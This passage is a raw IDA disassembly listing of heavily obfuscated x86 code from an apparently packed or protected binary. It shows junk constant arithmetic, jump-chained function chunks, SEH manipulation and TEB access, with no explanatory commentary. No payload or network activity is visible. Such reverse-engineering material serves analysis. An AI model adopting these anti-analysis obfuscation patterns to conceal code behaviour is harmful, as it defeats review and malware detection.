		or	edx, 0A3B9F7BBh
		xor	edx, 39224DC5h
		call	sub_446A16
		push	eax
		jmp	loc_4457C0

; =============== S U B	R O U T	I N E =======================================



sub_44A1B5	proc near		; CODE XREF: sub_4500FA:loc_4440E6j
					; sub_4453EC+D926p

; FUNCTION CHUNK AT 0043A06D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045097A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A2E3 SIZE 0000000C BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	5CC46CACh
		xchg	edx, [esp+0]
		mov	esi, edx
		pop	edx
		and	esi, 4C72E576h
		test	esi, 40000h
		jmp	loc_45097A
sub_44A1B5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44A1D5	proc near		; CODE XREF: hvvrg7ie:00441A8Bj
					; sub_4447AC+36CAp

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]

loc_44A1D8:				; CODE XREF: hvvrg7ie:loc_43BF3Cj
		pop	ebx
		xchg	edi, [esp-4+arg_0]
		jmp	sub_4403D4
sub_44A1D5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_44A1E1:				; CODE XREF: sub_45B9BB:loc_444089j
		jge	loc_44AFBA
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; START	OF FUNCTION CHUNK FOR sub_459E78

loc_44A1E7:				; CODE XREF: sub_459E78-2247j
		jmp	loc_43F23A
; END OF FUNCTION CHUNK	FOR sub_459E78
; ---------------------------------------------------------------------------

loc_44A1EC:				; CODE XREF: hvvrg7ie:00444691j
		jmp	loc_4545F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44989C

loc_44A1F1:				; CODE XREF: sub_44989C-A901j
		jmp	nullsub_258
; END OF FUNCTION CHUNK	FOR sub_44989C
; ---------------------------------------------------------------------------
		sbb	edi, 0B1E055A9h
		jbe	loc_45002F
		mov	[esi], edx
		jmp	loc_44AFB3
; ---------------------------------------------------------------------------
		and	ecx, ebp
		jmp	sub_45480F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44036B

loc_44A210:				; CODE XREF: sub_44036B+6j
		cmp	al, 0C2h
		jz	loc_45A25B
		mov	eax, [ebp-4]
		mov	ax, [eax]
		and	ax, 38FFh
		cmp	ax, 20FFh
		push	offset loc_4514B8
		jmp	nullsub_79
; END OF FUNCTION CHUNK	FOR sub_44036B

; =============== S U B	R O U T	I N E =======================================



sub_44A230	proc near		; DATA XREF: sub_44ABE8+9o

; FUNCTION CHUNK AT 0043C172 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440255 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E7B5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044EDB1 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044FDF9 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045152E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459FE0 SIZE 00000023 BYTES

		xchg	esi, [esp+0]
		mov	eax, esi
		pop	esi
		sub	eax, 25FA46EFh
		test	eax, 80h
		jmp	loc_45152E
sub_44A230	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D38

loc_44A247:				; CODE XREF: sub_449D38:loc_439598j
		jz	loc_44FA53

loc_44A24D:				; CODE XREF: sub_43E77C+198B8j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_449D38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4521D4

loc_44A252:				; CODE XREF: sub_4521D4-2348j
		jmp	nullsub_335
; END OF FUNCTION CHUNK	FOR sub_4521D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A625

loc_44A257:				; CODE XREF: sub_43A625+B27Dj
		jmp	loc_44EADF
; END OF FUNCTION CHUNK	FOR sub_43A625
; ---------------------------------------------------------------------------
		sub	ebp, eax
		jmp	loc_44FA4D
; ---------------------------------------------------------------------------
		cmp	ebx, 960F8DDFh
		jmp	loc_4575B8
; ---------------------------------------------------------------------------
		rol	esi, 19h
		jmp	loc_455086
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4475EC

loc_44A276:				; CODE XREF: sub_4475EC+Aj
		push	offset sub_446F6D
		jmp	nullsub_80
; END OF FUNCTION CHUNK	FOR sub_4475EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_44A280:				; CODE XREF: sub_43A839+DEE3j
		jge	loc_43F5B0
		jg	loc_455FB5
		jb	loc_43DF85
		jg	loc_44882B
		jmp	loc_43F5B0
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
		mov	edi, edx
		jmp	sub_45265D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E59

loc_44A2A4:				; CODE XREF: sub_449E59:loc_441EF6j
		jmp	ds:off_41D040
; END OF FUNCTION CHUNK	FOR sub_449E59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4576E4

loc_44A2AA:				; CODE XREF: sub_4576E4-1840Cj
		jmp	nullsub_273
; END OF FUNCTION CHUNK	FOR sub_4576E4

; =============== S U B	R O U T	I N E =======================================



sub_44A2AF	proc near		; CODE XREF: hvvrg7ie:0043AB51j
					; sub_449E59p ...

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 004407F0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441626 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044ADB0 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00457173 SIZE 0000000A BYTES

		jz	loc_441626
		pop	edx
		mov	eax, [esp-8+arg_4]
		call	sub_4571A0

loc_44A2BE:				; CODE XREF: hvvrg7ie:0044075Fj
		jmp	loc_457173
sub_44A2AF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		cmp	ebx, ebp
		jmp	loc_457B80

; =============== S U B	R O U T	I N E =======================================



sub_44A2CA	proc near		; CODE XREF: sub_439873+219Ap
					; hvvrg7ie:0044754Cj
		xchg	edi, [esp+0]
		pop	edi
		pop	ecx
		pop	ebx
		retn
sub_44A2CA	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44A2D1	proc near		; CODE XREF: sub_43B9FAp

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043EF34 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441263 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00442880 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044E61C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00451A27 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456B80 SIZE 00000005 BYTES

		push	large dword ptr	fs:0
		mov	large fs:0, esp
		jmp	loc_43EF34
sub_44A2D1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444315

loc_44A2E4:				; CODE XREF: sub_444315+67Cj
		rol	ebx, 17h
		add	ebx, 43BFF80Eh
		test	ebx, 4000h
		jmp	loc_4492D2
; END OF FUNCTION CHUNK	FOR sub_444315
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44A2F8:				; CODE XREF: sub_45889B-A4C5j
		pop	eax
		sub	eax, 0E628D2CBh
		xor	eax, 42DE9EEEh
		add	eax, ebp
		jmp	loc_4433FF
; END OF FUNCTION CHUNK	FOR sub_45889B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_304. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_44A30D:				; CODE XREF: sub_45B048-9CC3j
		jmp	loc_440CC6
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_44A312:				; CODE XREF: sub_43D5FD+3j
		jmp	loc_44C3FE
; END OF FUNCTION CHUNK	FOR sub_43D5FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_44A317:				; CODE XREF: sub_441FE4:loc_450DC8j
		push	160A46CEh
		pop	ebx
		rol	ebx, 1Ah
		or	ebx, 0A036A669h
		and	ebx, 8DF8739h
		or	ebx, 0CF8C18F6h

loc_44A332:				; CODE XREF: hvvrg7ie:004407D6j
		jmp	loc_457304
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44A337:				; CODE XREF: sub_450434:loc_453191j
		xchg	ecx, [esp+0]
		push	ebx
		push	offset loc_441808
		jmp	nullsub_180
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D16B

loc_44A345:				; CODE XREF: sub_43D16B:loc_44A581j
		cmp	edi, 38B97286h
		jmp	loc_4555A9
; END OF FUNCTION CHUNK	FOR sub_43D16B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44A350:				; CODE XREF: sub_44D2F8:loc_442797j
		jnz	loc_454587
		jmp	loc_439144
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_44A35B:				; CODE XREF: hvvrg7ie:00453E75j
		jb	loc_4490B5
		xchg	ebx, [esi]

loc_44A363:				; CODE XREF: hvvrg7ie:0043F006j
		rol	eax, 13h
		or	eax, 42FAF899h
		add	eax, 37A0436h
		call	sub_450C5A
		jmp	loc_4592E7
; ---------------------------------------------------------------------------

loc_44A37C:				; CODE XREF: hvvrg7ie:00446D65j
					; hvvrg7ie:loc_451945j
		mov	eax, [ebp-0Ch]
		neg	eax
		push	offset sub_455F71
		jmp	locret_45B953
; ---------------------------------------------------------------------------

loc_44A38B:				; CODE XREF: hvvrg7ie:004486A4j
		pop	edx
		add	edx, 9B0099C6h
		and	edx, 9077D914h
		add	edx, 6FD40964h
		popf
		xchg	edx, [esp]
		jmp	sub_446A16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_44A3A7:				; CODE XREF: sub_44736C:loc_44933Ej
					; hvvrg7ie:004591EEj
		jnb	loc_450995
		push	2C7E2B75h
		adc	ebx, esi

loc_44A3B4:				; CODE XREF: hvvrg7ie:00448919j
		sbb	edi, edx

loc_44A3B6:				; CODE XREF: sub_439FEE:loc_4591DEj
		add	eax, 7FE56AC9h
		sub	eax, 0EA02EFE6h
		jmp	loc_45228F
; END OF FUNCTION CHUNK	FOR sub_44736C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448620

loc_44A3C7:				; CODE XREF: sub_448620:loc_450FEDj
		xor	eax, ecx
		pop	ecx
		ror	eax, 1Ch

loc_44A3CD:				; CODE XREF: hvvrg7ie:00445507j
		push	offset sub_450AA8
		jmp	nullsub_135
; END OF FUNCTION CHUNK	FOR sub_448620

; =============== S U B	R O U T	I N E =======================================



sub_44A3D7	proc near		; CODE XREF: hvvrg7ie:00448A97j
					; sub_455F71+4p
		xchg	ecx, [esp+0]
		pop	ecx
		mov	[ebp-5], al
sub_44A3D7	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_44A3DE:				; CODE XREF: sub_43E484+9j
					; sub_44E44E:loc_443D26j ...
		jb	loc_458832
		cmp	byte ptr [ebp-5], 0
		jmp	loc_442370
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------

loc_44A3ED:				; CODE XREF: hvvrg7ie:0045070Fj
		adc	edx, 9C4925EAh
		adc	ebx, 65D22C4Dh
		jnz	loc_43A2DE
		jmp	loc_44846C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_44A404:				; CODE XREF: sub_44370F+11j
		mov	ebp, edx
		xchg	ebp, [esp+0]

loc_44A409:				; CODE XREF: hvvrg7ie:loc_43DEA5j
		call	sub_45329F
		mov	eax, 0D6CB94Ch
		call	sub_458A13
		jmp	loc_44ACC6
; END OF FUNCTION CHUNK	FOR sub_44370F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449007

loc_44A41D:				; CODE XREF: sub_449007:loc_44B677j
		or	ecx, 90A93563h
		add	ecx, ds:4000F6h
		sub	ecx, 0E212A05Dh
		add	ecx, 6CC3557Eh
		xchg	ecx, [esp+0]
		jmp	loc_43993C
; END OF FUNCTION CHUNK	FOR sub_449007
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_481. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EE33

loc_44A43E:				; CODE XREF: sub_43EE33+807Ej
		jmp	nullsub_88
; END OF FUNCTION CHUNK	FOR sub_43EE33
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E027

loc_44A443:				; CODE XREF: sub_43E027:loc_43AB94j
		xor	edx, 630D096Bh
		or	edx, 5660C314h
		add	edx, 2047A131h
		xchg	edx, [esp+0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_43E027
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_44A45D:				; CODE XREF: sub_440643+19424j
		mov	ecx, [ecx]
		mov	eax, [ebp+var_24]
		mov	dx, [eax+2]
		push	2FF63C10h
		pop	eax
		and	eax, 64778323h
		cmp	eax, 5C935733h
		jmp	loc_451FEA
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------

loc_44A47D:				; CODE XREF: hvvrg7ie:loc_44D513j
		jnz	loc_440794
		jmp	loc_4497F5
; ---------------------------------------------------------------------------

loc_44A488:				; CODE XREF: hvvrg7ie:00457057j
		jg	loc_44CD5F
		mov	edx, 0DD09A7ABh

loc_44A493:				; CODE XREF: hvvrg7ie:loc_45703Cj
		add	eax, 7C418A10h
		xchg	eax, [esp]
		jmp	loc_44C6F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449232

loc_44A4A1:				; CODE XREF: sub_449232+8976j
		add	ebp, edi
		and	edx, 0DFD84145h

loc_44A4A9:				; CODE XREF: sub_449232+Ej
		add	edx, 20E3BB4Ah
		add	edx, ebp
		add	edx, 5CF204AAh
		mov	[edx], eax
		jmp	loc_442803
; END OF FUNCTION CHUNK	FOR sub_449232
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_267. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F7CF

loc_44A4BF:				; CODE XREF: sub_44F7CF-BF74j
		jmp	loc_44F82D
; END OF FUNCTION CHUNK	FOR sub_44F7CF

; =============== S U B	R O U T	I N E =======================================



sub_44A4C4	proc near		; DATA XREF: sub_442F15:loc_455A51o
		add	eax, 743E6ECh
		call	sub_439717
sub_44A4C4	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_447E56

loc_44A4CF:				; CODE XREF: sub_447E56+1810j
		jmp	loc_452188
; END OF FUNCTION CHUNK	FOR sub_447E56

; =============== S U B	R O U T	I N E =======================================



sub_44A4D4	proc near		; CODE XREF: hvvrg7ie:0044BE63j
					; sub_458F33p
		xchg	edi, [esp+0]
		pop	edi
		push	ebp
		mov	ebp, esp

loc_44A4DB:				; CODE XREF: hvvrg7ie:loc_45AFB3j
		jns	sub_4518BD
		jmp	sub_43A839
sub_44A4D4	endp

; ---------------------------------------------------------------------------

loc_44A4E6:				; CODE XREF: hvvrg7ie:0044C48Ej
		sbb	ebx, ebp

; =============== S U B	R O U T	I N E =======================================



sub_44A4E8	proc near		; CODE XREF: hvvrg7ie:00444EEEp
		xchg	edi, [esp+0]
		pop	edi
		jmp	loc_44A56B
sub_44A4E8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	loc_453295
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44A4F6:				; CODE XREF: sub_442FD1:loc_448892j
					; sub_443BCD:loc_451121j
		mov	eax, large fs:18h
		add	eax, 0DF04206Ah
		add	eax, 20FBDFC6h
		mov	eax, [eax]
		jmp	loc_43DAF6
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44A510:				; CODE XREF: sub_44D2F8:loc_439144j
					; sub_44D2F8-149Fj
		push	0E326CFAEh
		xchg	esi, [esp+0]
		mov	eax, esi
		xor	esi, edx
		jmp	loc_45661D
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_44A521:				; CODE XREF: sub_43D285:loc_45641Dj
		jz	loc_45A947
		jmp	loc_4510A6
; END OF FUNCTION CHUNK	FOR sub_43D285
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_158. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44A52D:				; CODE XREF: hvvrg7ie:004486ACj
		test	ebx, 3EEC6BE4h
		jmp	loc_4411F0
; ---------------------------------------------------------------------------

locret_44A538:				; CODE XREF: hvvrg7ie:loc_43B470j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_44A539:				; CODE XREF: sub_44C2EA+277Bj
		jmp	loc_4478EE
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_44A53E:				; CODE XREF: sub_43D531+1041Dj
		jmp	loc_446D84
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------

loc_44A543:				; CODE XREF: hvvrg7ie:0044276Fj
		jmp	loc_43CC55
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_44A548:				; CODE XREF: sub_445CCD-692Cj
		shl	edx, 9
		pop	ebx
		push	6E637A76h
		jmp	loc_44D921
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458E44

loc_44A556:				; CODE XREF: sub_458E44-13651j
		xor	eax, 0CB51A84Ch
		add	eax, 59984399h
		rol	eax, 17h
		add	eax, 0F92BE7E3h

loc_44A56B:				; CODE XREF: sub_44A4E8+4j
		call	sub_44059F
		mov	ds:off_41D020, eax
		jmp	loc_445B3C
; END OF FUNCTION CHUNK	FOR sub_458E44
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D0C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D16B

loc_44A581:				; CODE XREF: sub_43D16B+1D0EBj
		jmp	loc_44A345
; END OF FUNCTION CHUNK	FOR sub_43D16B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CC1E

loc_44A586:				; CODE XREF: sub_44CC1E+Dj
		jmp	loc_44FDE4
; END OF FUNCTION CHUNK	FOR sub_44CC1E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_10. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		jz	loc_44F81A
		mov	eax, [esp]
		push	edx
		call	sub_454E54
		mov	eax, 20413B0Fh
		call	sub_44F7FD
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_44A5A5:				; CODE XREF: sub_44E533+9F3Dj
		jmp	loc_439BF4
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440402

loc_44A5AA:				; CODE XREF: sub_440402+Cj
		jmp	loc_44BA1B
; END OF FUNCTION CHUNK	FOR sub_440402
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F0E

loc_44A5AF:				; CODE XREF: sub_452F0E-17020j
		jge	loc_4507DC

loc_44A5B5:				; CODE XREF: sub_44BFF5-3FA3j
		jmp	loc_43E2C2
; END OF FUNCTION CHUNK	FOR sub_452F0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3F1

loc_44A5BA:				; CODE XREF: sub_44B3F1-53F0j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_44B3F1
; ---------------------------------------------------------------------------
		xchg	esi, edx
		jmp	loc_4507D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_44A5C6:				; CODE XREF: sub_441FE4:loc_43F803j
		pop	ecx
		and	ecx, 0E87889E1h
		xor	ecx, ds:4000FAh
		jnz	loc_45AB79
		pop	ecx
		jmp	loc_458679
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------

loc_44A5DF:				; CODE XREF: hvvrg7ie:loc_45A504j
		xchg	edi, ebp
		jg	loc_446EB6
		and	eax, 0E11BFA99h
		jmp	loc_43DB3C
; ---------------------------------------------------------------------------
		mov	eax, 0DD5E106Fh
		push	esi
		mov	esi, edi
		xchg	esi, [esp]
		push	717F8629h
		pop	edi
		or	edi, 26123B39h
		jmp	loc_443F8A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_44A60E:				; CODE XREF: sub_453405+Fj
		mov	esp, ebp
		xchg	edx, [esp+8+var_8]
		push	edx
		pop	ebp
		xchg	ecx, [esp+8+var_8]
		mov	edx, ecx
		jmp	loc_4401F9
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_44A61F:				; CODE XREF: sub_4403B6:loc_43A8B2j
		xor	eax, 0BEAC8AE3h
		rol	ebx, 1Fh

loc_44A628:				; CODE XREF: sub_44EB20:loc_4506B0j
		jns	loc_455274
		not	ecx
		jmp	loc_451AF8
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
		xor	eax, esi
		jmp	sub_44352A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DC31

loc_44A63C:				; CODE XREF: sub_43DC31:loc_44534Aj
		pop	eax
		rol	eax, 7
		and	eax, ds:4000F9h
		add	eax, 0FE43D017h
		xchg	eax, [esp+4+var_4]
		jmp	sub_45329F
; END OF FUNCTION CHUNK	FOR sub_43DC31

; =============== S U B	R O U T	I N E =======================================



sub_44A654	proc near		; CODE XREF: hvvrg7ie:0043CF01j
					; hvvrg7ie:00446AF6p

; FUNCTION CHUNK AT 0044E719 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [eax],	0C3h
		jmp	loc_44E719
sub_44A654	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457774

loc_44A660:				; CODE XREF: sub_457774+5j
		mov	eax, [esp+0]
		jmp	loc_442C16
; END OF FUNCTION CHUNK	FOR sub_457774
; ---------------------------------------------------------------------------

loc_44A668:				; CODE XREF: hvvrg7ie:loc_453FC5j
		jz	loc_45094B
		jmp	loc_44E708
; ---------------------------------------------------------------------------
		mov	edx, 0D504D785h
		call	sub_446A16
		push	eax
		ror	eax, 12h
		mov	ds:dword_439C94, eax
		jmp	locret_43C456
; ---------------------------------------------------------------------------

loc_44A68C:				; CODE XREF: hvvrg7ie:0045421Aj
		jg	loc_44C112

loc_44A692:				; CODE XREF: hvvrg7ie:loc_454210j
		sub	edx, 0CB2D08DDh
		jnb	loc_453F38
; START	OF FUNCTION CHUNK FOR sub_453422

loc_44A69E:				; CODE XREF: sub_453422-A181j
		jmp	nullsub_462
; END OF FUNCTION CHUNK	FOR sub_453422
; ---------------------------------------------------------------------------
		or	ebp, esi
		jmp	loc_453F2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44A6AA:				; CODE XREF: sub_450434:loc_456075j
		jnz	loc_448A81
		jmp	loc_43B5FC
; END OF FUNCTION CHUNK	FOR sub_450434

; =============== S U B	R O U T	I N E =======================================



sub_44A6B5	proc near		; CODE XREF: sub_446910j
					; DATA XREF: sub_446901+5o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439E67 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D35A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045813D SIZE 00000005 BYTES

		push	ecx
		push	232EFB6Eh
		pop	ecx
		add	ecx, 2EDFBA25h
		rol	ecx, 7
		add	ecx, 9CB8861Eh
		sub	ecx, 62A6B169h
		jmp	loc_439E67
sub_44A6B5	endp

; ---------------------------------------------------------------------------

loc_44A6D6:				; CODE XREF: hvvrg7ie:0043D178j
		pop	edi

; =============== S U B	R O U T	I N E =======================================



sub_44A6D7	proc near		; CODE XREF: sub_43A839+2412p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C37C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00440730 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004411CA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00441859 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443FBA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004471A2 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00447BFF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448F58 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AA03 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00452560 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004541B2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004593C1 SIZE 0000000B BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	9D816B0Dh

loc_44A6E0:				; CODE XREF: hvvrg7ie:loc_44BD0Dj
		jmp	loc_443FBA
sub_44A6D7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44A6E5:				; CODE XREF: sub_450434:loc_44E5E5j
		jz	loc_446008

loc_44A6EB:				; CODE XREF: sub_44C6BE+6567j
		jmp	loc_447639
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
		jg	loc_45269E
		jmp	loc_446006
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E9D6

loc_44A6FB:				; CODE XREF: sub_43E9D6:loc_453FBBj
		mov	ebp, esp
		push	edx
		push	ecx
		pop	edx
		jmp	loc_446266
; END OF FUNCTION CHUNK	FOR sub_43E9D6

; =============== S U B	R O U T	I N E =======================================



sub_44A705	proc near		; CODE XREF: sub_4554E8-172C2p
					; hvvrg7ie:00452632j

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx

loc_44A709:				; CODE XREF: sub_458374-15052j
		xchg	eax, [esp-4+arg_0]
		jmp	sub_452AE5
sub_44A705	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44A711	proc near		; DATA XREF: sub_446D8D:loc_4450CEo
		cmp	dword ptr [ebp-10h], 2
		jnz	loc_44108A
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 8
		jmp	loc_44108A
sub_44A711	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FD2B

loc_44A727:				; CODE XREF: sub_43FD2B:loc_447C28j
		xor	ebx, 863EDEE3h

loc_44A72D:				; CODE XREF: hvvrg7ie:00456AE1j
		rol	ebx, 11h
		add	ebx, 3837FE57h
		xchg	ebx, [esp+8+var_8]
		jmp	loc_451E17
; END OF FUNCTION CHUNK	FOR sub_43FD2B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_488. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		adc	eax, ebx
		xchg	esi, [ebx]
		jmp	sub_44A01E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_44A748:				; CODE XREF: sub_444BE1-3178j
		adc	ebx, ecx
		cmp	ebp, eax
		jmp	loc_458FFD
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
		adc	edx, 66119262h
		jmp	sub_450FB5
; ---------------------------------------------------------------------------

loc_44A75C:				; CODE XREF: hvvrg7ie:loc_4515D6j
		pop	ecx
		mov	edx, [ebp+8]
		imul	dword ptr [edx-4]
		add	eax, 2
		mov	[ebp-0Ch], eax
		mov	eax, [ebp-0Ch]
		add	[ebp-8], eax
		mov	eax, [ebp-8]
		jmp	loc_447070
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C290

loc_44A777:				; CODE XREF: sub_43C290+57CDj
		sub	eax, 0ADC15577h
		xor	eax, 7C52386Dh
		call	sub_44AE37

locret_44A788:				; CODE XREF: hvvrg7ie:0044154Cj
		retn
; END OF FUNCTION CHUNK	FOR sub_43C290
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_44A789:				; CODE XREF: sub_44BEBB-520Cj
		jmp	loc_43B475
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4538F3

loc_44A78E:				; CODE XREF: sub_4538F3:loc_455E03j
		jz	sub_4443AA
		jmp	loc_447B80
; END OF FUNCTION CHUNK	FOR sub_4538F3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_102. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

